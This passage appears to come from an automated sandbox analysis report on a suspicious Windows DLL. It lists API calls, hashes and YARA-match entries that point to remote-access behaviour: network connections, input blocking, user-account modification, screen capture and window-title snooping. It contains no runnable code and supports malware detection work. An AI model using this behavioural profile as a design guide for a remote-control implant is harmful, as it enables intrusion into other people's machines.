                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileLocallstrlen$AllocCloseCreateFreeHandleSize
                                                          • String ID:
                                                          • API String ID: 2793549963-0
                                                          • Opcode ID: 1d0de42e81ec7a97ed4485cc77a0b2a80b5f9abe04790932a430d9cbf81657f2
                                                          • Instruction ID: 308c1cce03677ded8cce1838fe27e550398bb3d797b3be4da8be1d4d23af97c4
                                                          • Opcode Fuzzy Hash: 1d0de42e81ec7a97ed4485cc77a0b2a80b5f9abe04790932a430d9cbf81657f2
                                                          • Instruction Fuzzy Hash: 0D3108327002145BD714DE78DC95B9AB2D6FB88621F484639FE1AD73C0DAB5A805C660
                                                          APIs
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,?,?), ref: 1000771C
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000,?,?), ref: 10007792
                                                          • SetFilePointer.KERNEL32(00000000,?,?,00000000,?,?), ref: 100077A7
                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 100077C4
                                                          • CloseHandle.KERNEL32(00000000,?,?), ref: 100077CB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateFolderHandlePathPointerSpecialWrite
                                                          • String ID: p
                                                          • API String ID: 2004626570-2181537457
                                                          • Opcode ID: db79ec1e1d2c2a338deb3c310fd97c6c46a2e7c23434e6060fbb021f232cdfea
                                                          • Instruction ID: 1e1907684de1c8bd89ee597228f05c738f3ecf463b7a0146f2a5c42f798544d2
                                                          • Opcode Fuzzy Hash: db79ec1e1d2c2a338deb3c310fd97c6c46a2e7c23434e6060fbb021f232cdfea
                                                          • Instruction Fuzzy Hash: 6331D7756447045BD318CA28CC45FABB796FBC8320F084B2DF95A972D0DAB49E05C751
                                                          APIs
                                                            • Part of subcall function 10004F20: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
                                                            • Part of subcall function 10004F20: CancelIo.KERNEL32(?), ref: 10004F57
                                                            • Part of subcall function 10004F20: InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
                                                            • Part of subcall function 10004F20: closesocket.WS2_32(?), ref: 10004F73
                                                            • Part of subcall function 10004F20: SetEvent.KERNEL32(?), ref: 10004F80
                                                          • ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                          • socket.WS2_32 ref: 10004A86
                                                          • gethostbyname.WS2_32(?), ref: 10004AA6
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Similarity
                                                          • API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
                                                          • String ID:
                                                          • API String ID: 513860241-0
                                                          APIs
                                                          • #939.MFC42(00000000,00000004,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000), ref: 100116CA
                                                          • #800.MFC42(00000000,00000004,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000), ref: 100116DB
                                                          • #6282.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 100116ED
                                                          • #535.MFC42(00000030,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 100116F9
                                                          • #535.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 1001173E
                                                          • #535.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 10011756
                                                            • Part of subcall function 10011790: #540.MFC42 ref: 100117B7
                                                            • Part of subcall function 10011790: #2818.MFC42(00000000, %c%s,?,?), ref: 100117E0
                                                            • Part of subcall function 10011790: #2763.MFC42(00000020), ref: 100117FD
                                                            • Part of subcall function 10011790: #537.MFC42(100FACDC,00000000,00000020), ref: 10011815
                                                            • Part of subcall function 10011790: #537.MFC42(100FB4F0,100FACDC,00000000,00000020), ref: 1001182A
                                                            • Part of subcall function 10011790: #922.MFC42(?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001183B
                                                            • Part of subcall function 10011790: #922.MFC42(?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001184C
                                                            • Part of subcall function 10011790: #939.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001185B
                                                            • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011869
                                                            • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011877
                                                            • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011885
                                                            • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011893
                                                            • Part of subcall function 10011790: #535.MFC42(00000000), ref: 100118F0
                                                            • Part of subcall function 10011790: #800.MFC42(00000000), ref: 10011906
                                                          • #536.MFC42(00000000,00000001,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 10011766
                                                          Similarity
                                                          • API ID: #800$#535$#537#922#939$#2763#2818#536#540#6282
                                                          • String ID:
                                                          • API String ID: 37758464-0
                                                          APIs
                                                          • Sleep.KERNEL32(0000000A), ref: 1001790C
                                                          • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1001792A
                                                          • PostMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1001793D
                                                          • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 10017959
                                                          • PostMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 1001796C
                                                            • Part of subcall function 100172E0: WaitForSingleObject.KERNEL32(?), ref: 10017309
                                                            • Part of subcall function 100172E0: CloseHandle.KERNEL32(?), ref: 10017316
                                                            • Part of subcall function 100172E0: #823.MFC42(00000110), ref: 1001733A
                                                          • BlockInput.USER32(?), ref: 1001797E
                                                            • Part of subcall function 10017CC0: GetSystemMetrics.USER32(00000000), ref: 10017CD7
                                                            • Part of subcall function 10017CC0: GetSystemMetrics.USER32(00000001), ref: 10017CE0
                                                          • BlockInput.USER32(00000000), ref: 100179B1
                                                          Similarity
                                                          • API ID: System$BlockInfoInputMessageMetricsParametersPost$#823CloseHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 3920574744-0
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000), ref: 10025889
                                                          • NetUserGetInfo.NETAPI32(00000000,00000000,00000003,?), ref: 100258B8
                                                            • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 10024614
                                                            • Part of subcall function 100245F0: #823.MFC42(00000002,?,00000000,00000000), ref: 10024621
                                                            • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1002463D
                                                          • NetUserSetInfo.NETAPI32(00000000,00000000,00000003,?,?,?), ref: 100258ED
                                                          • #825.MFC42(00000000,00000000,00000000,00000003,?,?,?), ref: 100258F5
                                                          • #825.MFC42(?,00000000,00000000,00000000,00000003,?,?,?), ref: 10025902
                                                          • NetApiBufferFree.NETAPI32(?), ref: 10025934
                                                          • LocalFree.KERNEL32(?), ref: 1002593E
                                                          Similarity
                                                          • API ID: #825ByteCharFreeInfoMultiUserWide$#823BufferLocallstrlen
                                                          • String ID:
                                                          • API String ID: 1574401665-0
                                                          APIs
                                                          • htons.WS2_32 ref: 100234F3
                                                          • inet_addr.WS2_32(?), ref: 10023509
                                                          • inet_addr.WS2_32(?), ref: 10023527
                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                          • setsockopt.WS2_32 ref: 1002355E
                                                          • connect.WS2_32(?,?,00000010), ref: 1002356E
                                                          • closesocket.WS2_32 ref: 1002357C
                                                            • Part of subcall function 100232C0: gethostbyname.WS2_32(?), ref: 100232C5
                                                            • Part of subcall function 100232C0: inet_ntoa.WS2_32(00000000), ref: 100232D8
                                                          Similarity
                                                          • API ID: inet_addr$closesocketconnectgethostbynamehtonsinet_ntoasetsockoptsocket
                                                          • String ID:
                                                          • API String ID: 1372979013-0
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 1001723D
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 10017248
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017259
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017264
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017273
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 1001727C
                                                          • DestroyCursor.USER32(?), ref: 100172AC
                                                          Similarity
                                                          • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CursorDestroy
                                                          • String ID:
                                                          • API String ID: 2236516186-0
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 100124D5
                                                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 100124E3
                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 10012522
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 1001252D
                                                          Strings
                                                          Similarity
                                                          • API ID: Library$AddressCriticalDeleteFreeLoadProcSection
                                                          • String ID: closesocket$ws2_32.dll
                                                          • API String ID: 1041861973-181964208
                                                          APIs
                                                          • Sleep.KERNEL32(00000064,?,?), ref: 1002CDE1
                                                          • wsprintfA.USER32 ref: 1002CE0C
                                                          • closesocket.WS2_32(00000000), ref: 1002CE24
                                                          • TerminateThread.KERNEL32(?,00000000), ref: 1002CE5C
                                                          • CloseHandle.KERNEL32(1012E1E4), ref: 1002CE63
                                                          Strings
                                                          Similarity
                                                          • API ID: CloseHandleSleepTerminateThreadclosesocketwsprintf
                                                          • String ID: nsocket-di:%d
                                                          • API String ID: 1790861966-355283319
                                                          • Opcode ID: 3425da4f1cd7310deef9f02c32fae69de305a835b173f5e1fbd4af5617af4f3a
                                                          • Instruction ID: 43a619284988255665467ed250730387a34e5931f30333b550beeddafff67785
                                                          • Opcode Fuzzy Hash: 3425da4f1cd7310deef9f02c32fae69de305a835b173f5e1fbd4af5617af4f3a
                                                          • Instruction Fuzzy Hash: 47118C34600165AFD710EF6CDCC4F823BE8FB45360FA5463AE804D77A4D779A9668B50
APIs
• GetSystemDirectoryA.KERNEL32 ref: 10026E26
• lstrcatA.KERNEL32(?,?), ref: 10026E38
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10026E55
• CloseHandle.KERNEL32(00000000), ref: 10026E7D
• LocalFree.KERNEL32(?), ref: 10026E96
Strings
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Yara matches
Similarity
• API ID: CloseCreateDirectoryFileFreeHandleLocalSystemlstrcat
• String ID: p
• API String ID: 3845662661-2181537457
• Opcode ID: 14b9efa5483a32bc41595b6595029f4fa2cd9a01486b53e31f71f9e7ac383b4f
• Instruction ID: 0d636d5cf498f0e200fc51c94bb837cf85bd2e6de4a3745d098e481c266d8e14
• Opcode Fuzzy Hash: 14b9efa5483a32bc41595b6595029f4fa2cd9a01486b53e31f71f9e7ac383b4f
• Instruction Fuzzy Hash: 10018074504301ABE720DF28DC89BDB77E4BB88714F448E1CF299961D0D7B8A548CBA2
APIs
• LoadLibraryA.KERNEL32(user32.dll), ref: 1000BB2D
• GetProcAddress.KERNEL32(00000000,GetWindowTextA), ref: 1000BB3B
• strstr.MSVCRT ref: 1000BB74
• FreeLibrary.KERNEL32(00000000), ref: 1000BB90
Strings
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProcstrstr
• String ID: GetWindowTextA$user32.dll
• API String ID: 1147820842-647680576
• Opcode ID: 42b4113caa3ec96d38a59490f1ca3cf002b8f7a7bca17497b91e9fe249d7a835
• Instruction ID: 01f9adafe10d49ab8bc32e9ede4b268ea2dd08531be522d4a9e00c30d8564b2e
• Opcode Fuzzy Hash: 42b4113caa3ec96d38a59490f1ca3cf002b8f7a7bca17497b91e9fe249d7a835
• Instruction Fuzzy Hash: 74F0C8395012106BF3219B28CCC4BEB7BE8FF84341F044924F94996254DBB99549C6A1
APIs
• GetSystemMetrics.USER32(00000000), ref: 1000EA0F
• GetSystemMetrics.USER32(00000001), ref: 1000EA13
• ChangeDisplaySettingsA.USER32 ref: 1000EA49
• ChangeDisplaySettingsA.USER32(?,00000001), ref: 1000EA56
• ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 1000EA66
Strings
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Yara matches
Similarity
• API ID: ChangeDisplaySettings$MetricsSystem
• String ID:
• API String ID: 840903655-3916222277
• Opcode ID: da8bcf99ab6d6381277834236ee77cd44cb5ccb353c2679cf74ed6f1b0556459
• Instruction ID: 9ef3ec576e7027de0717f9877b67978966fede7fd05d5f4f5218d1c1f9d83b39
• Opcode Fuzzy Hash: da8bcf99ab6d6381277834236ee77cd44cb5ccb353c2679cf74ed6f1b0556459
• Instruction Fuzzy Hash: F3F03A31A58324AAF720DB748D45F9B7AE4BF44B48F44091DB6589A1D0E7F5A4088F93
APIs
  • Part of subcall function 10012560: EnterCriticalSection.KERNEL32(?,?,?,1001246B,?,00000001,?,?,?,00000000,100988A8,000000FF,1000EB8A), ref: 1001256B
  • Part of subcall function 10012560: LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,100988A8,000000FF,1000EB8A), ref: 10012585
• LoadLibraryA.KERNEL32(ws2_32.dll), ref: 100125F6
• GetProcAddress.KERNEL32(00000000,closesocket), ref: 10012604
• FreeLibrary.KERNEL32(00000000), ref: 10012619
Strings
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Yara matches
Similarity
• API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
• String ID: 5$closesocket$ws2_32.dll
• API String ID: 2819327233-1779900740
• Opcode ID: 27ca07e9f078f202f3a329561812890b0cb509a05fc093fdfdbdbb04bf2e6fa4
• Instruction ID: 2761632c92e94d1a980d48baebd45236be465951dd9527d8c45c8e1131a91282
• Opcode Fuzzy Hash: 27ca07e9f078f202f3a329561812890b0cb509a05fc093fdfdbdbb04bf2e6fa4
• Instruction Fuzzy Hash: 83F0A77A100A116BD301EF1C9C84DDB77A8FF84752F440519FE4496201DB34E919C7B2
APIs
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Yara matches
Similarity
• API ID: Sleep$atoi$CloseHandle
• String ID:
• API String ID: 3951340052-0
• Opcode ID: a3dae96142abd2ad21c9e791e016f87c3cb7eca048d36a150d9ec5762a61b45e
• Instruction ID: d7a51b80122ffeeab1abcf823611aaaec88fa79b16853a0ade1e46a9717f9ac6
• Opcode Fuzzy Hash: a3dae96142abd2ad21c9e791e016f87c3cb7eca048d36a150d9ec5762a61b45e
• Instruction Fuzzy Hash: 0341E73B31416016C554F729BC41FBFA754FBE5722F81442FF1869A281CE206C9B83B9
APIs
• CreateDIBSection.GDI32(?,00000000,00000000,77045D50,00000000,00000000), ref: 100185E1
• SelectObject.GDI32(00000000,00000000), ref: 100185EF
• BitBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 1001860E
• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00CC0020), ref: 1001862F
• DeleteObject.GDI32(?), ref: 10018685
• free.MSVCRT ref: 10018694
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Yara matches
Similarity
• API ID: Object$CreateDeleteSectionSelectfree
• String ID:
• API String ID: 2595996717-0
• Opcode ID: ee283649881eec98d8cbad5e7b64363b03abddda214ff71c648d186bcbc73e34
• Instruction ID: fa73614132ced6616fd7bc227f346a67f57bb193df799f847b61321046b9127f
• Opcode Fuzzy Hash: ee283649881eec98d8cbad5e7b64363b03abddda214ff71c648d186bcbc73e34
• Instruction Fuzzy Hash: E34126B5600705AFD714DF68CC84E6BB7EAFB88600F14891DF98A8B390D670EE458B61
APIs
• BlockInput.USER32(00000000), ref: 10016966
• BlockInput.USER32(?,?,?), ref: 10016989
• InterlockedExchange.KERNEL32(?,?), ref: 100169A0
• BlockInput.USER32(?,?,?), ref: 100169A9
• InterlockedExchange.KERNEL32(?,?), ref: 100169C0
• InterlockedExchange.KERNEL32(?,?), ref: 100169D9
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Yara matches
Similarity
• API ID: BlockExchangeInputInterlocked
• String ID:
• API String ID: 3466551546-0
• Opcode ID: 7274aee29f7d4d2a2de31e6c4e64948058b118fdd37ba114e8c6fc55ca8315a3
• Instruction ID: bf2dd9b5654f157943e35733b8f3b73f0b93b8599c458bfd2c4311f32437dab4
• Opcode Fuzzy Hash: 7274aee29f7d4d2a2de31e6c4e64948058b118fdd37ba114e8c6fc55ca8315a3
• Instruction Fuzzy Hash: 3D31E33B30856157D284E738BC61EEFA755FFD9320B05892BF585DA241CA20E89683B0
APIs
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Yara matches
Similarity
• API ID: malloc$realloc$strstr
• String ID:
• API String ID: 686937093-0
• Opcode ID: 6c6eb5024497b7099948d6fa03faf251760030852925ab041fa65ee9e74f37cf
• Instruction ID: 77dd24013c4c70d5dbbb406fc0c88ef9f28fbba95e417396a5267408fea13c55
• Opcode Fuzzy Hash: 6c6eb5024497b7099948d6fa03faf251760030852925ab041fa65ee9e74f37cf
• Instruction Fuzzy Hash: AA3157366006114FC304CF3CAC8026AFBE5EBC9666F44067DEA89C3391DE75DD0A87A1
APIs
• #823.MFC42(?,00000058,00000000,00000000,0000005C,00000000,10017EFB,?,?,?,?,?,?,00000000), ref: 100188AB
• GetDC.USER32(00000000), ref: 10018906
• CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 10018913
• GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10018926
• ReleaseDC.USER32(00000000,00000000), ref: 1001892F
• DeleteObject.GDI32(00000000), ref: 10018936
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823BitmapBitsCompatibleCreateDeleteObjectRelease
                                                          • String ID:
                                                          • API String ID: 1489246511-0
                                                          • Opcode ID: 232e81e2328815f38dc1846d181fe650c2457a96f065839fb43a6e4f516f74b8
                                                          • Instruction ID: c876030701d45069bbaf201adcf95ae34e10d61091fae5aa7b66ba3b571a8907
                                                          • Opcode Fuzzy Hash: 232e81e2328815f38dc1846d181fe650c2457a96f065839fb43a6e4f516f74b8
                                                          • Instruction Fuzzy Hash: 8D31C6716057018FD324CF69CCC4B66FBE6FF95308F188A6DE5498B291D770A649CB50
                                                          APIs
                                                          • #823.MFC42(?,0000005C,00000000,00000000,00000060,00000000,10018C0A,?,?,00000001), ref: 100190FB
                                                          • GetDC.USER32(00000000), ref: 10019156
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 10019163
                                                          • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10019176
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 1001917F
                                                          • DeleteObject.GDI32(00000000), ref: 10019186
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823BitmapBitsCompatibleCreateDeleteObjectRelease
                                                          • String ID:
                                                          • API String ID: 1489246511-0
                                                          • Opcode ID: 03719f9758a2d591c926ce4265d16c4aa9b88d838764e5f7700e274da321e404
                                                          • Instruction ID: ef3514cd601d8d145b1532123b0b9183357df65c168f27f3a63bee1d8f630a14
                                                          • Opcode Fuzzy Hash: 03719f9758a2d591c926ce4265d16c4aa9b88d838764e5f7700e274da321e404
                                                          • Instruction Fuzzy Hash: 9631F3712057029FD324CF69CC88B5BFBE6FF89344F188A6DE5498B291E770A549CB90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: strncmp
                                                          • String ID: false$null$true
                                                          • API String ID: 1114863663-2913297407
                                                          • Opcode ID: cdbdc36268714888663b28bbe182531708683dd6fabd3d740ca363935316f6e3
                                                          • Instruction ID: 00cf7c64ec7db015d10f7af15bebca5fd974838d1259f6499305d769b8ebe985
                                                          • Opcode Fuzzy Hash: cdbdc36268714888663b28bbe182531708683dd6fabd3d740ca363935316f6e3
                                                          • Instruction Fuzzy Hash: 2521B77A6052156AE311DB19FC41ACB77DCDFC52B0F06C42AF54886209E334E9878B91
                                                          APIs
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 10008505
                                                          • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000850C
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 10008539
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000854C
                                                          • #825.MFC42(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 1000859A
                                                          • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?,000000FF,10008498), ref: 100085BD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #825$CloseHandle$D@2@@std@@D@std@@Tidy@?$basic_string@U?$char_traits@V?$allocator@
                                                          • String ID:
                                                          • API String ID: 2070391518-0
                                                          • Opcode ID: 7d5be02d86cc8920d62cf2d17b5541d9373f0ddaeac744c5cd82ef4eaf4a695e
                                                          • Instruction ID: 37eccab93eae1f9570d16d686a1212c04e0715a42fba5b1868afdc0cba55ac79
                                                          • Opcode Fuzzy Hash: 7d5be02d86cc8920d62cf2d17b5541d9373f0ddaeac744c5cd82ef4eaf4a695e
                                                          • Instruction Fuzzy Hash: 1241ACB5600B058FD704CF68C881B96F7E4FF49750F004A2DE6AA87381EB70BA54CB81
                                                          APIs
                                                          • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009AAA
                                                          • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009ABB
                                                          • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009ACC
                                                          • #825.MFC42(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009AF5
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009B2A
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009B3D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@2@@std@@D@std@@Refcnt@?$basic_string@U?$char_traits@V?$allocator@$CloseHandle$#825
                                                          • String ID:
                                                          • API String ID: 3981934315-0
                                                          • Opcode ID: 8b2b594f4aed80e73da269208a1a90eec485e5e9e688899508e82b25adb2269c
                                                          • Instruction ID: 3f5e6c1ba8cdd1ffd5d3919399f724efa296fb395ea5f4111f29f1806b4e9a25
                                                          • Opcode Fuzzy Hash: 8b2b594f4aed80e73da269208a1a90eec485e5e9e688899508e82b25adb2269c
                                                          • Instruction Fuzzy Hash: A53182747006019FE744CF29C980996B7E9FF85790B14866DF95ACB795EB30EC40CBA0
                                                          APIs
                                                          • _snprintf.MSVCRT ref: 1002CCCF
                                                            • Part of subcall function 1002CBD0: inet_addr.WS2_32(?), ref: 1002CBDA
                                                          • recv.WS2_32(00000000,?,00000002,00000000), ref: 1002CD31
                                                          • CreateThread.KERNEL32(00000000,00000000,1002CBF0,?,00000000,?), ref: 1002CD80
                                                          • CloseHandle.KERNEL32(00000000), ref: 1002CD94
                                                          • Sleep.KERNEL32(000003E8), ref: 1002CD9D
                                                          • closesocket.WS2_32(00000000), ref: 1002CDB1
                                                          Memory Dump Source
